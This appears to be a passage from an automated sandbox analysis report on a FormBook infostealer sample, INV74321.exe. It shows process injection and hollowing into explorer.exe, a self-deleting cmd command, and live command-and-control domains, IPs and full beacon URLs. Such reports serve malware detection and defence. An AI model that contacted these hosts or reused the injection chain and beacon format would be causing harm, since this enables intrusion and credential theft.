          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03810EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03757E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03757E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03757E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03757E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03757E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03757E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_037FFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_0374E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03818ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_0377A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_0377A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_0374C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_0374C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_0374C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03778E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03801608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_037716E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_037576E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_037736CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_037FFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03788EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_0380AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_0380AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_037C46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_037DFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_0376C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_0376C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03767D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_038105AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_038105AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03783D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_037C3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03753D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03753D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03753D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03753D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03753D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03753D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03753D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03753D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03753D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03753D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03753D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03753D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03753D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_0374AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_037CA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03774D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03774D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03774D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_0380FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_0380FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_0380FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_0380FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_037F8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_0375D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_0375D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03818D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_037C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_037C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_037C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_037C6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_037C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_037C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_0380E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03771DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03771DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03771DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_037735A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_0377FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_0377FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03772581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03772581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03772581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03772581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03742D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03742D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03742D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03742D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\wlanext.exe | Process token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Domain query: www.aqayeseo.com
          Source: C:\Windows\explorer.exe | Domain query: www.downtoearthwork.com
          Source: C:\Windows\explorer.exe | Domain query: www.shebagholdings.com
          Source: C:\Windows\explorer.exe | Network Connect: 119.18.54.126 80
          Source: C:\Windows\explorer.exe | Domain query: www.booweats.com
          Source: C:\Windows\explorer.exe | Domain query: www.0o-a-8v4l76.net
          Source: C:\Windows\explorer.exe | Domain query: www.topcasino-111.com
          Source: C:\Windows\explorer.exe | Network Connect: 104.21.46.55 80
          Source: C:\Windows\explorer.exe | Domain query: www.lingoblasterdiscount.com
          Source: C:\Windows\explorer.exe | Network Connect: 154.84.101.247 80
          Source: C:\Windows\explorer.exe | Domain query: www.smartmatch-dating-api.com
          Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe | Domain query: www.xn--espacesacr-k7a.com
          Source: C:\Windows\explorer.exe | Network Connect: 64.190.62.111 80
          Source: C:\Windows\explorer.exe | Domain query: www.king-jackpot.com
          Source: C:\Windows\explorer.exe | Network Connect: 87.98.148.38 80
          Source: C:\Windows\explorer.exe | Network Connect: 163.43.122.109 80
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\INV74321.exe | Section loaded: unknown target: C:\Users\user\Desktop\INV74321.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\INV74321.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\INV74321.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\INV74321.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\INV74321.exe | Thread register set: target process: 3388
          Source: C:\Windows\SysWOW64\wlanext.exe | Thread register set: target process: 3388
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\INV74321.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\INV74321.exe | Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: D90000
          Source: C:\Users\user\Desktop\INV74321.exe | Process created: C:\Users\user\Desktop\INV74321.exe 'C:\Users\user\Desktop\INV74321.exe'
          Source: C:\Windows\SysWOW64\wlanext.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\INV74321.exe'
          Source: explorer.exe, 00000005.00000002.473046481.0000000001398000.00000004.00000020.sdmp | Binary or memory string: ProgmanamF
          Source: explorer.exe, 00000005.00000000.220866561.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 00000008.00000002.475564298.0000000005E50000.00000002.00000001.sdmp | Binary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.238911410.000000000871F000.00000004.00000001.sdmp, wlanext.exe, 00000008.00000002.475564298.0000000005E50000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.220866561.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 00000008.00000002.475564298.0000000005E50000.00000002.00000001.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.220866561.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 00000008.00000002.475564298.0000000005E50000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 1.1.INV74321.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.INV74321.exe.29a0000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.1.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.INV74321.exe.29a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.INV74321.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 1.1.INV74321.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.INV74321.exe.29a0000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.1.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.INV74321.exe.29a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.INV74321.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules 1 | Path Interception | Access Token Manipulation 1 | Virtualization/Sandbox Evasion 3 | OS Credential Dumping | Security Software Discovery 231 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Process Injection 512 | Access Token Manipulation 1 | LSASS Memory | Virtualization/Sandbox Evasion 3 | Remote Desktop Protocol | Clipboard Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 512 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information 1 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | Carrier Billing Fraud |
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information 3 | LSA Secrets | File and Directory Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing 11 | Cached Domain Credentials | System Information Discovery 13 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |

          Behavior Graph

          Behavior Graph ID: 411840 | Sample: INV74321.exe | Start date: 12/05/2021 | Architecture: WINDOWS | Score: 100

          [Graph image not recoverable; nodes and edges as extracted from the graph:]
          Start node: DNS/IP: www.cylindberg.com, www.painteredmond.com; signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules), Found malware configuration, Malicious sample detected (through community Yara rule), 4 other signatures; started INV74321.exe 18
          INV74321.exe 18: dropped C:\Users\user\AppData\Local\Temp\...\q7pl.dll, PE32; signatures: Detected unpacking (changes PE section rights), Maps a DLL or memory area into another process, Tries to detect virtualization through RDTSC time measurements; started INV74321.exe
          INV74321.exe: signatures: Modifies the context of a thread in another process (thread injection), Maps a DLL or memory area into another process, Sample uses process hollowing technique, Queues an APC in another process (thread injection); injected explorer.exe
          explorer.exe (injected): DNS/IP: www.0o-a-8v4l76.net 163.43.122.109, 49733, 80 SAKURA-BSAKURAInternetIncJP Japan; king-jackpot.com 119.18.54.126, 49727, 80 PUBLIC-DOMAIN-REGISTRYUS India; 10 other IPs or domains; signatures: System process connects to network (likely due to code injection or exploit); started wlanext.exe
          wlanext.exe: signatures: Modifies the context of a thread in another process (thread injection), Maps a DLL or memory area into another process, Tries to detect virtualization through RDTSC time measurements; started cmd.exe 1
          cmd.exe 1: started conhost.exe


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          INV74321.exe | 30% | Virustotal |
          INV74321.exe | 18% | Metadefender |
          INV74321.exe | 72% | ReversingLabs | Win32.Trojan.SpyNoon

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Temp\nsi6113.tmp\q7pl.dll | 26% | Metadefender |
          C:\Users\user\AppData\Local\Temp\nsi6113.tmp\q7pl.dll | 55% | ReversingLabs | Win32.Trojan.Pwsx

          Unpacked PE Files

          Source | Detection | Scanner | Label
          1.0.INV74321.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
          0.2.INV74321.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
          1.1.INV74321.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          8.2.wlanext.exe.3ce7960.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          0.2.INV74321.exe.29a0000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          0.0.INV74321.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
          1.2.INV74321.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          Source | Detection | Scanner | Label
          www.downtoearthwork.com | 0% | Virustotal |
          www.shebagholdings.com | 0% | Virustotal |
          www.booweats.com | 0% | Virustotal |
          www.0o-a-8v4l76.net | 0% | Virustotal |

          URLs

          Source | Detection | Scanner | Label
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          http://www.topcasino-111.com/or4i/?iN6=3f8HQQz9URnG4Uu+PIIk9qulCbedODjEyUaPCq0CAbkTamHv8kfsRb46QNyKsrnaM2YM&KdTL=a2JxONfH | 0% | Avira URL Cloud | safe
          http://www.tiro.com | 0% | URL Reputation | safe
          http://www.downtoearthwork.com/or4i/?iN6=vk1T1/Otk3yMmnVlXkpxnnLL8r3GDGLc1I2gV0bP1VjWwuz1bkf/wMDaHcJA224PqQY0&KdTL=a2JxONfH | 0% | Avira URL Cloud | safe
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://www.carterandcone.coml | 0% | URL Reputation | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          http://www.typography.netD | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
          http://www.king-jackpot.com/or4i/?iN6=xDS7CyCJ4m7HrOhyeYRIonE7yEohNWwwbSjxvOh7bSQREc8K1tWvWT2hFG1Cb6Pxbdkw&KdTL=a2JxONfH | 0% | Avira URL Cloud | safe
          http://www.booweats.com/or4i/?iN6=qot6XnlSyPOFXuVGORD9CEtZEU4GG3KqT75/dB/Qk/mHCfMLKHKtxcGvS1QijbP8ODf8&KdTL=a2JxONfH | 0% | Avira URL Cloud | safe
          http://fontfabrik.com | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe
          http://www.0o-a-8v4l76.net/or4i/?KdTL=a2JxONfH&iN6=/YqV2YobZFGxQDMEPRH3FzX3sp56PIzy9ik5N6g8OdLGQC9Q4dIJ/Xm93vftNToRdJfn | 0% | Avira URL Cloud | safe
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          http://www.shebagholdings.com/or4i/?KdTL=a2JxONfH&iN6=JH4nS7VeW/UW/jbaFlzhauiIX/+RMeGdEmcv+8JYSHoft+e37yOEU8VwtY3nHc6WUP+N | 0% | Avira URL Cloud | safe
          http://www.sandoll.co.kr | 0% | URL Reputation | safe
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          http://www.sakkal.com | 0% | URL Reputation | safe
          http://www.xn--espacesacr-k7a.com/or4i/?KdTL=a2JxONfH&iN6=aXFVbdpXZKuOxG6QcVTci15xYCj/Qxdw9P9YBGKWWpBj56F6fv1TkawGdiCQA9RepvWh | 0% | Avira URL Cloud | safe
          www.nobleandmarble.com/or4i/ | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.downtoearthwork.com | 104.21.46.55 | true | true | | unknown
          www.shebagholdings.com | 154.84.101.247 | true | true | | unknown
          www.booweats.com | 64.190.62.111 | true | true | | unknown
          www.0o-a-8v4l76.net | 163.43.122.109 | true | true | | unknown
          www.topcasino-111.com | 87.98.148.38 | true | true | | unknown
          xn--espacesacr-k7a.com | 34.102.136.180 | true | false | | unknown
          www.painteredmond.com | 192.185.0.218 | true | false | | unknown
          king-jackpot.com | 119.18.54.126 | true | true | | unknown
          www.aqayeseo.com | unknown | unknown | true | | unknown
          www.smartmatch-dating-api.com | unknown | unknown | true | | unknown
          www.xn--espacesacr-k7a.com | unknown | unknown | true | | unknown
          www.king-jackpot.com | unknown | unknown | true | | unknown
          www.cylindberg.com | unknown | unknown | true | | unknown
          www.lingoblasterdiscount.com | unknown | unknown | true | | unknown

                              Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://www.topcasino-111.com/or4i/?iN6=3f8HQQz9URnG4Uu+PIIk9qulCbedODjEyUaPCq0CAbkTamHv8kfsRb46QNyKsrnaM2YM&KdTL=a2JxONfH | true | Avira URL Cloud: safe | unknown
          http://www.downtoearthwork.com/or4i/?iN6=vk1T1/Otk3yMmnVlXkpxnnLL8r3GDGLc1I2gV0bP1VjWwuz1bkf/wMDaHcJA224PqQY0&KdTL=a2JxONfH | true | Avira URL Cloud: safe | unknown
          http://www.king-jackpot.com/or4i/?iN6=xDS7CyCJ4m7HrOhyeYRIonE7yEohNWwwbSjxvOh7bSQREc8K1tWvWT2hFG1Cb6Pxbdkw&KdTL=a2JxONfH | true | Avira URL Cloud: safe | unknown
          http://www.booweats.com/or4i/?iN6=qot6XnlSyPOFXuVGORD9CEtZEU4GG3KqT75/dB/Qk/mHCfMLKHKtxcGvS1QijbP8ODf8&KdTL=a2JxONfH | true | Avira URL Cloud: safe | unknown
          http://www.0o-a-8v4l76.net/or4i/?KdTL=a2JxONfH&iN6=/YqV2YobZFGxQDMEPRH3FzX3sp56PIzy9ik5N6g8OdLGQC9Q4dIJ/Xm93vftNToRdJfn | true | Avira URL Cloud: safe | unknown
          http://www.shebagholdings.com/or4i/?KdTL=a2JxONfH&iN6=JH4nS7VeW/UW/jbaFlzhauiIX/+RMeGdEmcv+8JYSHoft+e37yOEU8VwtY3nHc6WUP+N | true | Avira URL Cloud: safe | unknown
          http://www.xn--espacesacr-k7a.com/or4i/?KdTL=a2JxONfH&iN6=aXFVbdpXZKuOxG6QcVTci15xYCj/Qxdw9P9YBGKWWpBj56F6fv1TkawGdiCQA9RepvWh | false | Avira URL Cloud: safe | unknown
          www.nobleandmarble.com/or4i/ | true | Avira URL Cloud: safe | low

                              URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | false | | high
          http://www.fontbureau.com | explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | false | | high
          http://www.fontbureau.com/designersG | explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | false | | high
          http://www.fontbureau.com/designers/? | explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | false | | high
          http://www.founder.com.cn/cn/bThe | explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers? | explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | false | | high
          https://sedo.com/search/details/?partnerid=324561&language=it&domain=booweats.com&origin=sales_lande | wlanext.exe, 00000008.00000002.475299853.0000000003E62000.00000004.00000001.sdmp | false | | high
          http://www.tiro.com | explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers | explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | false | | high
          http://nsis.sf.net/NSIS_ErrorError | INV74321.exe | false | | high
          http://www.goodfont.co.kr | explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.carterandcone.coml | explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.sajatypeworks.com | explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.typography.netD | explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | false | | high
          http://www.founder.com.cn/cn/cThe | explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
